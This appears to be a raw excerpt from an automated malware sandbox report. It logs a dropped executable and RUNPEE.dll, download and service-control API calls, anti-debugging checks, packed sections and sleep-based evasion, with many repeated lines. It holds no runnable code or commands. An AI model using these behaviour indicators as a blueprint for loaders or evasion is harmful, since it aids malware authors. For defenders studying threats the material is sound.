Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00435226 push ecx; ret	5_2_00435239
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004006B5 push 76401798h; iretd	5_2_004006C5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00457A00 push eax; ret	5_2_00457A1E

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr	Static PE information: section name: R2K entropy: 7.97262588173533
Source: RUNPEE.dll.3.dr	Static PE information: section name: 7}~F^E entropy: 7.953129116581613

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_004062E2 ShellExecuteW,URLDownloadToFileW,

5_2_004062E2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File created: C:\Users\user\AppData\Local\Temp\RUNPEE.dll			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

5_2_0041AC43

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

5_2_0041D0CF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 2380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 2550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 4550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 4BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 5BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 5D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 6D00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

5_2_0041A941

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3496	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Window / User API: threadDelayed 1764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Window / User API: threadDelayed 8229	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-45979

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 3748	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 3028	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6160	Thread sleep count: 1764 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6160	Thread sleep time: -5292000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6160	Thread sleep count: 8229 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6160	Thread sleep time: -24687000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2332	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	5_2_004090DC
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	5_2_0041C7E5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0044EA89 FindFirstFileExA,FindClose,FindNextFileA,	5_2_0044EA89
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	5_2_00408CDE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	5_2_00419CEE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	5_2_00407EDD

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

5_2_00407357

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.0000000001366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2828717862.0000028EB002B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2830352054.0000028EB565B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.000000000132F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000002.917657834.00000000007B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcj%

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

API call chain: ExitProcess graph end node

graph_5-47014

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_0043B88D

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

5_2_0041D0CF

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_004438F4 mov eax, dword ptr fs:[00000030h]

5_2_004438F4

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00411999 GetNativeSystemInfo,GetProcessHeap,RtlAllocateHeap,SetLastError,SetLastError,

5_2_00411999

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00435398
